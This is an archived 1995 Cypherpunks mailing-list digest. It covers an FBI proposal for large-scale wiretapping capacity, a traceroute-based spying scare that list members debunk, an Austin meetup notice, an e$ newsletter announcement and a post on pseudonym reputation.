Message-ID: <199511020955.BAA04564@you.got.net>


In today's San Jose Mercury, online edition. Forgive me if this has already
been passed around.

-=-

FBI seeks huge wiretapping system

BY JOHN MARKOFF

New York Times

The FBI has proposed a national wiretapping system of unprecedented size and
scope that would give law enforcement officials the capacity to monitor
simultaneously as many as one out of every 100 phone lines in some high
crime areas of the country.

Such a surveillance ability would vastly exceed the current needs of law
enforcement officials around the country, who in recent years have conducted
an annual average of less than 850 court-authorized wiretaps -- or fewer
than one in every 174,000 phone lines.

The plan, which needs congressional approval for the money to finance it,
would still require a court warrant to conduct wiretaps. Still, the proposed
expansion of the government's eavesdropping abilities raises questions among
telephone
industry executives as to why the FBI believes it may require such broad
access to the nation's phone network in the future.

And privacy-rights advocates see the specter of a Big Brother surveillance
capability whose very existence might encourage law enforcement officials to
use wiretapping much more frequently as an investigative tool.

``A proposal that envisions some form of electronic surveillance for one of
every 100 telephone lines would be frightening to many people,'' said James
Dempsey, deputy director at the Center for National Security, a public
policy organization in Washington. ``I think law enforcement needs to be
honest with the public about what its intentions are.''

Generally, FBI officials contend that an advanced, high-capacity monitoring
system will be necessary as more of modern life and business -- and crime --
takes place as voice or computer conversations over digital phone lines.

On digital lines, communications are transmitted in electronic pulses
represented by the 1's and 0's of computer code. Such communications are
harder to monitor than with the old-fashioned analog lines in which
conversations are
transmitted as electronic signals corresponding to audible sound waves.

An FBI spokesman declined to elaborate on the bureau's perceived need for
such an expansion of its wiretapping abilities.

``The full implementation is absolutely essential for law enforcement and
public safety,'' said Mike Kortan, an FBI spokesman in Washington. ``We are
in ongoing discussions with the communications industry. Therefore it would be
inappropriate to comment further at this point.''

The plan, which was published in the Federal Register on Oct. 16 but has not
drawn much attention yet outside law enforcement and industry circles, is
the first comprehensive outline by the FBI of the surveillance capabilities
it will require under the controversial Digital Telephony Act that was
signed by President Clinton in 1994.

The law was adopted in the closing hours of the previous Congress after the
administration overcame telephone industry resistance to the extensive
network equipment changes that will be required to permit digital
wiretapping. In order to overcome that opposition, the administration
promised that the government would allocate $500 million to help upgrade
industry networks.

Whether the law will ever go into effect is an open question, because it
requires a federal appropriation, to be paid for out of criminal fines and
penalties, that Congress has not yet authorized. The budget legislation now
pending on Capitol Hill has no proviso for the digital wiretapping money,
although the House budget bill included a wiretapping allocation until last
week.

The House measure was deleted after objections from several freshman
Republicans, including Rep. Bob Barr of Georgia, a former federal
prosecutor, who said that he objected to the way the money for wiretapping
would be raised and that he had concerns about how the FBI might use such a
sweeping surveillance ability.

But some lawmakers say the Clinton administration, which has vowed to veto
the current federal budget bill, saw little point in pushing for inclusion
of the financing for the wiretapping at this time.

And others note that money for the digital wiretapping plan, presented as a
tough anti-crime measure, could be difficult for lawmakers of either party
to oppose outright. The FBI and the Clinton administration are expected to
continue seeking funds in the future.

The scope of the FBI plan has startled telephone industry executives, who
said it was difficult to estimate how much it would ultimately cost to carry
out the capacity increases. The officials are worried, however, that if
federal funds are not forthcoming, the government may attempt to shift the
financing burden to the rates that businesses and consumers pay to use the
telephone network.

``The difficulty in this process is going to come down the road when they
ask us to redesign our entire systems and not pay us,'' said Larry Clinton,
associate vice president for governmental affairs at the U.S. Telephone
Association, an
Washington-based industry lobbying group. ``If they try to make rate payers
pay for this we will run into serious and perhaps even constitutional
problems which we hope to avoid.''

The FBI plan, as filed in the Federal Register, calls for designating each
local telephone as falling under one of three categories. Category I would
be made up of urban areas, where most electronic surveillance currently
takes place. In
these regions, telecommunications carriers would be required to make
available up to 1 percent of their network capacity when sought by
law-enforcement officials.

In lower-crime urban and suburban areas, designated Category II, phone
companies would need to make available up to five-tenths of a percent of
their network lines, while the predominantly rural low-crime Category III
areas would require
0.25 percent.

For many of the most densely populated metropolitan areas, like New York,
Los Angeles and Chicago, there are tens of millions of phone lines. The FBI
document contends that in such places, the demands of digital wiretapping
may make it
necessary to intercept tens of thousands of phone calls at once.

Some industry officials said they were at a loss to understand how the
government expected to make use of such requirements. At an industry
gathering last year, telephone industry executives discussing the Digital
Telephony Act could not think of an example of more than seven wiretaps ever
being run from a single phone company office at any one time, according to
Ron Peat, director of federal legislation analysis for the Pacific Telesis
Group, the San Francisco-based regional Bell company.

Some technology experts said that the FBI's projected needs, which the
bureau said were based on historical records and on demographic data and
market forecasts, reflect a growing belief by law enforcement that
electronic surveillance will rapidly increase in importance in the digital
age, where most communications will take place using an array of mobile
computerized devices.

``These are staggering numbers,'' said Mark Rasch, director of information
security law and policy for Science Applications International Corp. in
McLean, Va. ``Either they do a lot more wiretaps than they now admit, or
they plan
on doing a significant larger number of wiretaps in the future because of
the fear of domestic terrorism.''
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From jya at pipeline.com  Sun Nov  5 10:31:40 1995
From: jya at pipeline.com (John Young)
Date: Mon, 6 Nov 1995 02:31:40 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511051821.NAA20156@pipe1.nyc.pipeline.com>



Responding to msg by perry at piermont.com ("Perry E. Metzger") on 
Sun, 05 Nov 12:13 PM

>Quit looking for the spooks where they aren't. You 
>should always  assume your line is being tapped if you 
>are saying something you don't  want heard, anway.


   True, it's not Smokey behind the billboard, blinked at you
   by oncoming headlights, it's the sensors in the roadbed
   that reads your tag -- when it leaves your home-ain, then
   at the remailer donkeystops, then at your recreational
   stash-house, at the pedo-filmery, at the Semtex-Pantex
   workhide, at the digi-wallet-copyfast, right into
   ananonymous Ken-Barbie's e-slot.

   TLA-Smokey is friendly, maybe intra-humanly let you off
   with a warning, not the anonymous high-techery, it responds
   only to its friend, the tag -- tracing, storing, mutating 
the
   whinefleshers, 0's by 1's.

   That's the how, maybe, but for who or what or why?

   Or is it just machines feeding machines incomprehensibles?

















From jya at pipeline.com  Sun Nov  5 10:41:07 1995
From: jya at pipeline.com (John Young)
Date: Mon, 6 Nov 1995 02:41:07 +0800
Subject: DIR_ty$
Message-ID: <199510301238.HAA06263@pipe2.nyc.pipeline.com>


10-30-95.  In slave to Orlin Crabbe's "The Money Laundromat," 
The NYPaper has a Page One lead story:


"Cali Drug Cartel Using U.S. Business to Launder Cash. 105 
Firms Suspected. Trade Related Schemes Said to Have Moved $3 
Billion Through Companies."


DIR_ty$





From ravage at einstein.ssz.com  Sun Nov  5 13:20:06 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Mon, 6 Nov 1995 05:20:06 +0800
Subject: Meeting: Nov. 4 in Austin, TX
Message-ID: <199511030104.TAA09845@einstein.ssz.com>



Hi,

A reminder to those in the central Texas area on Saturday (Nov. 4, 1995)
from 6-8pm. The Austin chapter will be meeting at Ted's Greek Restaraunt on
the 400 block of Congress (next to Oscar Snowden's).

We will be trying to wrest control of the last couple of tables in the rear.

Issues we will be discussing:

     *  Further interests of the members and forming working groups.

     *  Make further arrangements to start doing PGP key signing services
        at the end of the monthly EFF meeting.

     *  Discuss doing a 1-hour video on the basic ideas and issues of
        cryptography and current society.

     *  Invitation from CT-LUG to come to their next build-up which is
        scheduled for Nov. 18 but is tentative for now. If all works well
        this may be an opportunity to play with some re-mailer software
        under Linux.

Hope to see some of you there!

                                              Jim Choate
                                              ravage at einstein.ssz.com






From whitaker at sover.net  Sun Nov  5 13:28:19 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Mon, 6 Nov 1995 05:28:19 +0800
Subject: whose watchin the watchers
Message-ID: <199511052119.QAA28698@maple.sover.net>


The following is an exerpt is from Jim Warren's listserv, GovAccess 183.

Are there folks on this list who have insights or definitive information on
this topic?

Are there ways for someone with access to modify router tables to constantly
create alternate paths at other routers which would serve to end-around any
such snoops?

***********begin_included_text*************************

&&&&&&&&&&&&&&&&&&&&


Is Someone Already Watching All International Net Traffic?

The following is the transcript of an actual communications trace that a
friend ran, while I was sitting next to him, watching -- reprinted here
with his permission.

He did a "traceroute" of two messages that he sent from his machine in
Switzerland (he'd telneted into it while we were at a computer conference
in California).

Traceroute automatically reports each Internet node through which a message
passes, as it proceeds from origin to destination.

He did two traceroutes.  The first was from Switzerland to an addressee at
Netcom in San Jose, California.  The second was from Switzerland to an
addressee in Israel.


Date: Fri, 21 Apr 95 02:54:58 +0200
From: kelvin at fourmilab.ch (John Walker)
To: jwarren at well.com
Subject: Traceroute

> /usr2/kelvin> traceroute netcom11.netcom.com
traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40 byte packets
 1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
 4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
 6   (134.222.9.1)  65 ms  109 ms  252 ms
 7  lp (134.222.35.2)  196 ms  179 ms  405 ms
 8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
 9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms

> /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
byte packets
 1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
 4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
 6   (134.222.9.1)  80 ms  312 ms  84 ms
 7  lp (134.222.35.2)  270 ms  400 ms  216 ms
 8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
 9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
11  ...


Notice that both messages went through an unnamed site -- 134.222.9.1 and
then a strangely-named site, "lp (134.222.35.2)" -- then through the same
Vienna, Virginia (USA) site ... and thereafter, on to their destination.
I.e., the second message went through Virginia to get from Switzerland to
Israel.

The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
report, ``No match for "134.222.9.1". '' and `` No match for
"134.222.35.2".''

Now let me see ... which spy agencies are located in or near Virginia?

--jim


&&&&&&&&&&&&&&&&&&&&

***********end_included_text*************************






From shields at tembel.org  Sun Nov  5 14:33:31 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 6 Nov 1995 06:33:31 +0800
Subject: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <47jcob$cf7@yage.tembel.org>


In article <Pine.HPP.3.91.951105123707.4854A-100000 at cor.sos.sll.se>,
Mats Bergstrom <asgaard at sos.sll.se> wrote:
> This applies very much so in Sweden too. It *is* illegal to maintain any
> database with 'information on persons' (like their email addresses) without
> approval from the Data Inspection. But it's an open secret that this law
> is broken on a massive front and no bureaucrat is really trying to uphold it.

This is the worst possible situation, because it equates to a licence
to harass for the police.  If you obey the law, then you are at a
disadvantage compared to people who are not bound by it because they
are ignoring it, and who can because they are doing government-friendly
things; but if you break the law, then you can be prosecuted.
-- 
Shields.





From rah at shipwright.com  Sun Nov  5 14:39:12 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 06:39:12 +0800
Subject: e$: The Movie
Message-ID: <v02120d01acc2e740f9f0@[199.0.65.105]>


-----BEGIN PGP SIGNED MESSAGE-----


                               Announcing
                             e$: The Movie


11/6/95

Almost a year ago, I noticed that traffic was tapering off on one of
the digital commerce e-mail lists I'm subscribed to, www-buyinfo, which
is run by Dave Kristol at ATT. So, every once in a while, I started
zinging relevant crossposts over there from cypherpunks, a famous
crypto list with about 20-25% e$ content.

I started getting actual fan mail for this, so I kept doing it. Now, it
seems that, say, 85% of all of the traffic on www-buyinfo is my
cross-posting from cypherpunks. Dave says there are 500-600 people
worldwide who have stayed on www-buyinfo during all this time, so it
seems like I can claim at least some of them as an audience for what
I'm doing, with no promotion of the list at all, except word of mouth.

We've even had several discussions on the list about whether I should
continue doing it, and every time we've done so, the answer has been a
resounding "yes".  However, www-buyinfo does have a charter, and even
though what I'm doing drifts the charter substantially, I'm restricted
in what I can put there.  It's not fair to Dave or the subscribers for
me to turn their list into my private spam channel. Also, Dave
has said repeatedly that he's interested in re-tooling www-buyinfo
into something more technical, so, at some point, the party's going
to be over, and we'll have to pack up our tents and move on.

Meanwhile, I've also taken to writing on the net, and more recently,
speaking to professional groups, on the topic of e$, and I have gotten
very good response to that as well. An edited version of one of my
longer net.rants is in this week's InfoWorld, for instance. That one
got me fan mail from all sorts of people (like Guy Kawasaki, Stewart
Alsop, and Adam Engst, for instance) when the original version appeared
first in the apple-internet-users list a while back.

I've managed to have a lot of fun with this stuff. One of my
suggestions on cypherpunks started ecm, the secondary market for
Digicash's beta-test digital cash certificates. I had so much fun
talking about digital commerce with Peter Cassidy, a freelance writer
for Forbes ASAP, Wired, and the Economist, that the two of us started
the Boston Society for Digital Commerce, a luncheon group that meets
once a month to talk about this stuff. BSDC has about 40 members now,
and our second meeting is on Tuesday.


So, I've decided I'd jump into this with both feet.  A friend of mine at
Apple Computer, Vinnie Moscaritolo, has volunteered his time to put up
a web site about e$. It's pretty much live, though still under
construction, at its temporary home of

http://www.webstuff.apple.com/~vinnie/rah/ .

Vinnie is now in the process of hooking up a small stand-alone machine,
to live somewhere else on the net besides in Apple's domain, which will
house this web-site along with three mailing lists, all of which will
be archived and eventually web-searchable. Over the next few weeks,
we'll be starting up these lists and announcing them here. They are:

* _e$_: A discussion list on digital commerce and financial cryptography
and their consequences.  This list will be for people who have a strong
understanding of markets of all kinds, who understand the consequences
of strong cryptography and digital certificate technology on public
networks, and who want to make money in this environment. We welcome
Entrepreneurs, Analysts, Cryptographers (Amateur and Otherwise), Free
Marketeers, small-"l" libertarians, and, even (horrors!) a
crypto-anarchist or two.

* _e$pam_:  My personal spam-channel to the universe. ;-). Pretty much
what I do now with www-buyinfo from cypherpunks, only with all the
net.sources I can find. It will have the same content touchstone as e$
will, but it will consist entirely of filtered information from
secondary sources. In other words, it won't say "e$spam" until I say it
says "e$spam".  At some point, e$spam will have filter-fodder in it --
or some other method will be set up -- so that people who are already
subscribed to one of the lists I'm filtering won't have to see things
twice. We're still working on that.

* _Ne$ws_, a newsletter with original content from myself and various
other authors, in the same vein as Adam Engst's TidBITS, but focused on
the subject of e$.


I figure that there are enough different ways to pay for both my time
and the resources necessary to make this work that it's now worth
spending a little of my own time and resources in order to get all this
started. Certainly the market for information and commentary on e$
isn't getting any smaller.

I'm looking at a sort of "creep, crawl, walk, run" scenario for funding
all of this. The first stage will be to solicit sponsorships, both
in-kind and in plain old money. The second will probably be to
determine whether subscriptions to any or all of the e$ lists or
archives would ever make sense. Finally, with the advent of real
digital cash on the net, and with First Virtual proving e$ trades can
be done by anyone, it may be possible to do some kind of e$
micropayment-as-you-go system for things like subscriptions,
web-archive access, and the like, so I'm looking at that also.

Obviously, I'm don't want to price myself out of the market with all of
this, because, like anything else on the net, anyone can come along and
do exactly the same thing for less money, and then I'm out of business.
I do think, however, that what I propose to do is worth money to the
people who want it, and so I'm going to figure out how to get paid to
do it.


Well, that's about it.  Watch this space for details, and wish me luck!


Cheers,

Bob Hettinga,
impre$ario-to-be






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ04K/gyLN8bw6ZVAQG+2QQAowzLfmH5paNaZgrAdlEeSH9YcKysW07A
B7QxbQhP9WIat2rMIA4HoIioQr+Xo5RZ3oOO+btSksHNnV1P3Q2Ca49BJxdMsQd7
GhdGoUv2/C150mH13crc3cZuOCChfisjYHM8So2XsuVjKex4ETZecDLfSn+b4yzl
mtfJvZQ3e1o=
=2vLb
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From jwarren at well.com  Sun Nov  5 14:44:42 1995
From: jwarren at well.com (Jim Warren)
Date: Mon, 6 Nov 1995 06:44:42 +0800
Subject: whose watchin the watchers -- I GOT THE EXPLANATIONS OKAY
Message-ID: <v02120d1bacc2e9d5eaf4@[206.15.66.109]>


At 04:19 PM 11/05/95, Stephen Whitaker wrote:
>The following is an exerpt is from Jim Warren's listserv, GovAccess 183.
>
>Are there folks on this list who have insights or definitive information on
>this topic?
>
>Are there ways for someone with access to modify router tables to constantly
>create alternate paths at other routers which would serve to end-around any
>such snoops?
>
>***********begin_included_text*************************
>
>&&&&&&&&&&&&&&&&&&&&
>
>
>Is Someone Already Watching All International Net Traffic?
>
>The following is the transcript of an actual communications trace that a
>friend ran, while I was sitting next to him, watching -- reprinted here
>with his permission.
>
>He did a "traceroute" of two messages that he sent from his machine in
>Switzerland ...




Folks,

I've received ample explanations/corrections to my naive paranoia.

The following will be posted in GovAccess.184, within an hour or two.

Many thanks.

--blushing-jim
Jim Warren, GovAccess list-owner/editor (jwarren at well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

[puffery:  John Dvorak Lifetime Achievement Award (1995); James Madison
Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal.
(1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994);
Pioneer Award, Electronic Frontier Foundation (its first year, 1992);
founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]

=== EXPLANATION OF WHAT GOVACCESS IS & WHERE TO FIND ITS ARCHIVES ===

GovAccess is a list distributing irregular info & advocacy regarding
technology and civil liberties, citizen access to government - and
government access to citizens, covert and overt.

To add or drop GovAccess, email to  Majordomo at well.com  ('Subject' ignored)
with message:  [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message:  info GovAccess





===this will be posted in GovAccess.184===

Enlightenment Regarding European Net Traffic Flowing Through Numbered Sites

If I'm gonna let my net-surveillance paranoias burn brightly, I better
learn more about the technology.  Which is to say, I goofed:

In #183, yesterday eve, I flamed forth about how a friend traced his
messages from Switzerland to San Jose CA and to Israel -- and discovered
that they "went through an unnamed site -- 134.222.9.1 and then a
strangely-named site, "lp (134.222.35.2)" -- then through the same Vienna,
Virginia (USA) site ... and thereafter, on to their destination."

With beady eye and suspicious mind, I then entoned, "Now let me see ...
which spy agencies are located in or near Virginia?"


Well, half a dozen net-*literate* technoids quickly corrected the errors of
my ways:

>Date: Sun, 5 Nov 1995 08:25:17 +0100
>Subject: GA183 booboo
>To: jwarren at well.com
>From: nobody at REPLAY.COM (Anonymous)   [apparently an anonymous remailer --jim]
>Organization: RePLaY aND CoMPaNY UnLimited
>XComm: Replay may or may not approve of the content of this posting
>XComm: Report misuse of this automated service to <postmaster at REPLAY.COM>
>
>Jim--
>      Great work, but you've got to be more careful. ...
>
>I ran it by Cypherpunks and, within a half-hour, got ... [among others] ...
>
>From: Richard Huddleston <reh at wam.umd.edu>
>Date: Sun, 5 Nov 1995 01:55:09 -0500
>To: cypherpunks at toad.com, nobody at REPLAY.COM
>Subject: Re: lp (134.222.35.2)?
>Sender: owner-cypherpunks at toad.com
>
>134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
>(instead of the individual IP addresses) you find:
>
>European Unix Users Group (NET-EUNET-X25)
>   Kruislaan 413
>   NL-1098 SJ Amsterdam
>   NETHERLANDS
>...

and

>X-Pgp-Fingerprint: 01107BAB1C85F1B49358D98FEAD4339E
>Date: Sat, 4 Nov 1995 23:01:42 -0800
>To: cypherpunks at toad.com
>From: Stephan Somogyi <somogyi at digmedia.com>
>...
>>>  Now let me see ... which spy agencies are located in or near Virginia?
>
>Oh please.
>
>The probable reason that the InterNIC doesn't know about the
>132.222.0.0 networks is because they're in Europe. If you search for
>either of the network numbers of the IP addresses mentioned above in
>the RIPE database <http://www.ripe.net/>, you will find that they
>belong to the EUnet backbone.
>
>After pinging 134.222.9.1 successfully, I telnetted to it and it
>claimed, quite plausibly, that it's a device (presumably a router) in
>Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
>fills me with no dread whatsoever.
>
>Stephan Somogyi               Senior Editor               Digital Media

and

>Date: Sun, 05 Nov 1995 13:42:55 -0800
>From: John Fricker <jfricker at vertexgrp.com>
>Subject: Return of Paranoia and Vienna
>
>Using nslookup to reverse resolve 134.222.15.2 reveals it to be
>"Oslo1.NO.EU.net" and 134.222.9.1 to be "Amsterdam4.NL.EU.net".
>
>Now this doesn't mean they are not nefarious, packet sniffing spy-boxes
>since I doubt the spooks would name their routers
>"cloak-and-dagger1.cia.gov".
>
>It still is strange that it is cheaper for UUnet/EUnet to route traffic
>across the Atlantic to get to Isreal instead of developping a continental
>backbone. In many ways the architecture of the Internet is still rather
>primitive.
>
>john fricker
>dir research and development
>The Vertex Group, Inc.

followed by

>Date: Sun, 05 Nov 1995 13:23:06 -0800
>From: John Fricker <jfricker at vertexgrp.com>
>Subject: Paranoia and Vienna
>
>Now, Jim I think you're a touch paranoid here. And after reading the
>latest about the FBI wire tap bill I don't blame you ;)
>
>134.222.0.0 is in the EU domain so most likely both of those routers are
>European. The packets then went into UU Net Technologies Vienna hub. I did
>a traceroute from me to 193.8.230.64 and went through two EU.net routers
>in Vienna, VA. Vienna must be one fiberous town! Sure would make for a
>nice little listening post for nosy ears. I don't know off hand the
>relationship between EUnet and UUnet but I would guess that they are more
>than just friendly. Microsoft bought a minority interest in UUnet which
>inspired UUnet to grow rapidly. (Now there's another tidbit for paranoia!)

===

Oh ... sez I <blusing>.


So the remaining question was -- why would a msg from Switzerland go
through Alternet in Virginia on its way to Israel?  I asked several of the
[many] folks who enlightened me re the numbered sites, and within minutes,
got back:

>From: Tim Pozar <pozar at kumr.lns.com>
>Date: Sun, 5 Nov 1995 11:28:44 -0800 (PST)
>
>...
>> So the only remaining question is ... why should a Swizz msg go thru
>> Alternet in Virginia in order to get to Israel?
>
>A number of links go through there.  Most of this is tied up with
>politics and policies with the links that go over to Europe and
>little to do with the NSA. ...

Which leaves me without any inflamatory paranoia at all ... except to
wonder about those "politics and policies" that cause traffic from and to
European sites to flow through a site near the NSA and CIA.

===

To which, I just received this additional response -- email traffic's hot
'n' heavy (sender prefers to be anon :-):

Almost certainly just a matter of available capacity or administrative
issues.  There may be higher bandwidth routes available from both of those
points to the U.S., rather than directly to each other, so the traffic is
routed that way.  There are often administrative issues too--that is,
sometimes the direct routes are controlled by some company or group to which
a different net doesn't subscribe, and they have to route differently,
through entities that they both subscribe to or have agreements with (e.g.
Alternet).  This happens a bunch in Europe (and here for that matter--it's
part of the reason that some traffic from L.A. to S.F. used to route through
Atlanta or NY or similar places--and still can (depending on the service
providers).  The topology of the net is "logically" sensible, but not
necessarily geographically so...


--spooky jim, who can't tell a carburator from a crankshaft, net-wise


&&&&&&&&&&&&&&&&&&&&


Net Police, Take Note:  Net is the Fastest Self-Correcting Human System I Know

On the upside of the above notes is that they [again] illustrate how
quickly the net corrects erroneous postings -- which is my answer to all
those who howl for censorship or content-control of the net, "because it
distributes incorrect information."

It does -- but it also distributes, uh, "vigorous" corrections to any iota
of intended or naive imperfection in a posting, at least to the extent that
such postings receive significant circulation on the net.  (And if they
don't, then they are little different than the erroneous information that
people exchange by voice and phone, every day.)

And woe be unto the reputation of anyone who appears to have posted
*intentionally* incorrect or biased-incomplete information -- who get
vigorously torched in the process of getting corrected.  :-)

I think it was John Perry Barlow who observed that, the best way to get a
question answered on the net, was to post it in the form of an erroneous
statement.

--jim







From wiltship at iccu6.ipswich.gil.com.au  Sun Nov  5 14:49:26 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Mon, 6 Nov 1995 06:49:26 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511052237.JAA25268@iccu6.ipswich.gil.com.au>


>
>Anonymous writes:
>> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>> >  then a strangely-named site, "lp (134.222.35.2)"
>[...]
>> >  Now let me see ... which spy agencies are located in or near Virginia?
>

 A hopcheck from here puts these sites in amsterdam nl.

cheers

peter


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship at gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10






From perry at piermont.com  Sun Nov  5 16:06:51 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 6 Nov 1995 08:06:51 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <9511021924.AA12407@alpha>
Message-ID: <199511022239.RAA06803@jekyll.piermont.com>



Mike McNally writes:
> 
> hallam at w3.org writes:
>  > It is a fair point that just because technology has changed the 
>  > nature of the game it should not mean that wiretaps cease to be 
>  > possible.
> 
> I disagree that this is a "fair point".  That wiretaps are possible is
> an accident of design.  Just because that slice of the salami appears
> gone, I see no reason to concede that it can't be re-attached.

Indeed, I have searched both the constitution and my collected works
of Nietzsche and found no reference to the inalienable right of
governments to listen in on any conversations, let alone the 1% of
conversations the FBI wants access to. By the way, I believe the
quantity in question exceeds the quantity tapped by the East German
government at its height -- certainly it does if you take into account
the fact that phones were more scarce there.

Thank you, Louis Freeh, for taking another step towards the police state.

Perry





From nobody at REPLAY.COM  Sun Nov  5 16:58:06 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 6 Nov 1995 08:58:06 +0800
Subject: whose watchin Cypherpunks: nym question
Message-ID: <199511060047.BAA06872@utopia.hacktic.nl>


      Stephen Whitaker-nym's resubmission ("whose watchin the watchers"
4:19 PM 11/5/95) of the very same material that I had  posted last night
suggest some questions about some aspects of nym theory. I hope the
following isn't too naive, and I apologize if it is.
      When I saw issue 183 of GovAccess, Jim Warren-nym's remarks seemed
suspect, but I didn't have a thorough enough understanding of the issues
to judge them myself -- so I decided to vet the question with the
Cypherpunks. I'm glad I did: the quick and knowledgeable responses
clarified the error, and I forwarded them to Warren-nym so that he could
correct himself promptly. The end result, as Warren rightly suggests I
think, is that a better understanding of the issues has been propagated to
his subscriber base.
      AFAIK, Warren-nym has an excellent reputation -- and that fact
certainly encouraged me to provide him with the info he would need to
correct himself quickly. OTOH, my actions garner no reputation for me --
neither for my True Name nor for nobody at REPLAY.COM. Of course, whether
such actions merit any reputational shift is debatable: I contributed no
knowledge of my own, just merely acted as a go-between. Still, the fact
that GovAccess 184 quotes my response might suggest that I beat others to
the punch; and were I able to act in such a capacity on a regular and
consistent basis, and were I to do so in a field with higher stakes, I
would surely garner a reputation. Granted, this is a lot of "woulda,
coulda" -- but it leads me to conclude that it is not the shortcomings of
my *action* that are the cause of the fact that I garner no reputational
improvement in this instance.
      Stephen Whitaker-nym's resubmission of this material, OTOH, lowers
his reputation in my eyes -- which is strange, because the only real
distinction between what he did and what I did has to do with the fact
that he sent mail to Cypherpunks without reading the Cypherpunks traffic.
So his reputational shift is purely contextual.
      So why don't I, then? Well, for starters, the nym that the Replay
remailer assigned to me is publicly accessible: anyone who uses this
remailer in the way that I did will be assigned the same quasi-nym,
nobody at REPLAY.COM. yet if, through some statistical improbability, I were
the *only* person *ever* to use this remailer in this way, and I *only*
ever used it to perform actions that would improve the reputation of a
stable nym, then the public knowledge of Replay's functionality would
neverthless serve to hinder any reputational shift that my actions had
earned: people might say, "Every message I know of that has passed through
Replay has been accurate, timely, and significant" -- but that would
improve the reputation of the Replay remailer rather than of its sole
user, myself, even though it was my actions -- *including* the use of the
Replay remailer -- that brought about this reputational shift.
      So what is a nym if not a "True Name"? I distinguish "True Name" (in
quotes) from True Name: a True Name is tied to a matrix of information
extrinsic to the entity it refers to (a SS# has no *intrinsic* relation to
the entity it designates), whereas a "True Name", though free of this info
matrix, neverthless operates according to the same logic that a True Name
does -- in terms of being tied to actions that garner reputational shifts.
The point being -- I'm probably being pretty unclear -- that if the major
distinction between a "True Name" and a True Name are links (or the lack
thereof) to arbitary and external information (and maybe the disposability
that the lack of links implies), then a lot of nym theory seems like it
pretty much reproduces True Name logic and operations. 
      Anyway, a lot of you understand this all better than I do, so I hope
to learn from any responses I receive.

Thanks.





From frissell at panix.com  Sun Nov  5 18:22:49 1995
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 6 Nov 1995 10:22:49 +0800
Subject: 800_ape
Message-ID: <199511060208.VAA14144@panix.com>


At 08:23 AM 11/4/95 -0500, you wrote:
>   11-5-95. NYPaper Sunday Magazine:
>
>   "Making Microsoft Safe For Capitalism. How do you restrain
>   an 800-pound gorilla?" Cover story. By James Gleick.

>     It's time to draw the line. But where?
>
>      'Anything not a direct lie or clearly illegal is O.K. to
>      do if it advances Microsoft's tribal cause,' Mitchell
>      Kapor says. 'This licenses the worst sort of
>      manipulations, lies, tortured self-justification and so
>      on.'

